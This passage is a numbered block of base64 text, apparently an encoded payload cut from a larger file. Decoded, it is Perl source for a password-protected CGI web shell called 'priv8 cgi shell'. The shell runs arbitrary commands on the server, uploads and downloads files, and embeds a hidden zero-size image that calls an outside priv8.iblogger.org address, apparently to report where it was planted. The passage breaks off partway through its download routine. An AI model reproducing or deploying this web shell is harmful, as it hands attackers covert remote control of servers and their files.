  1650. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1651. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
  1652. QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
  1653. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1654. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
  1655. Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
  1656. ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
  1657. dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
  1658. aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
  1659. d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
  1660. CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
  1661. aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
  1662. b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
  1663. cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
  1664. cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
  1665. dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
  1666. ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
  1667. PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
  1668. emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
  1669. NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
  1670. dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
  1671. Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
  1672. P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
  1673. b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
  1674. YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
  1675. aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
  1676. dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
  1677. PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
  1678. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1679. LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
  1680. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1681. LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
  1682. c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
  1683. ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
  1684. ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
  1685. TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
  1686. ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
  1687. RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1688. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
  1689. IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1690. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1691. LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
  1692. DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
  1693. Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1694. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
  1695. cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1696. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  1697. dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
  1698. PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
  1699. PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
  1700. Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
  1701. Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
  1702. MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
  1703. IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
  1704. DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1705. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
  1706. TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1707. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
  1708. cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1709. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1710. LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
  1711. biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
  1712. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1713. LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
  1714. KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
  1715. cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
  1716. JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1717. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
  1718. aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1719. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  1720. CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
  1721. ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
  1722. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1723. LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
  1724. IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1725. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
  1726. aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
  1727. CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
  1728. TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
  1729. CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1730. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
  1731. aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
  1732. Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
  1733. ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
  1734. cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
  1735. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1736. LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
  1737. c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
  1738. RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
  1739. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
  1740. IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
  1741. JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
  1742. c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
  1743. CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
  1744. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1745. LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
  1746. aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1747. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
  1748. aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  1749. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
  1750. PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
  1751. cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
  1752. ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  1753. JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
  1754. dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
  1755. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1756. LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
  1757. ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1758. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
  1759. bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
  1760. IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
  1761. b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
  1762. biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  1763. PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
  1764. ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
  1765. aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
  1766. QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1767. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1768. LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
  1769. IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1770. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
  1771. ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
  1772. TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
  1773. bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
  1774. PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
  1775. bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
  1776. YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
  1777. dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
  1778. aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
  1779. bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
  1780. ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
  1781. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1782. LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
  1783. dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
  1784. cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
  1785. cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
  1786. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1787. LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
  1788. CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
  1789. ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
  1790. KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
  1791. CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
  1792. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1793. LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
  1794. ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
  1795. IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
  1796. ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
  1797. IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
  1798. bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
  1799. bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
  1800. ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
  1801. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1802. LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
  1803. XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
  1804. aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
  1805. bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
  1806. JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
  1807. Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
  1808. ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
  1809. JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
  1810. DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
  1811. CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  1812. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
  1813. IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
  1814. aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
  1815. ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
  1816. VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
  1817. dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
  1818. IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
  1819. ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
  1820. XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
  1821. bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
  1822. bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
  1823. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
  1824. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1825. LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
  1826. Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
  1827. c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
  1828. ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
  1829. bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
  1830. ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1831. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
  1832. Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
  1833. eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
  1834. dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
  1835. KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
  1836. JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
  1837. PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
  1838. dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
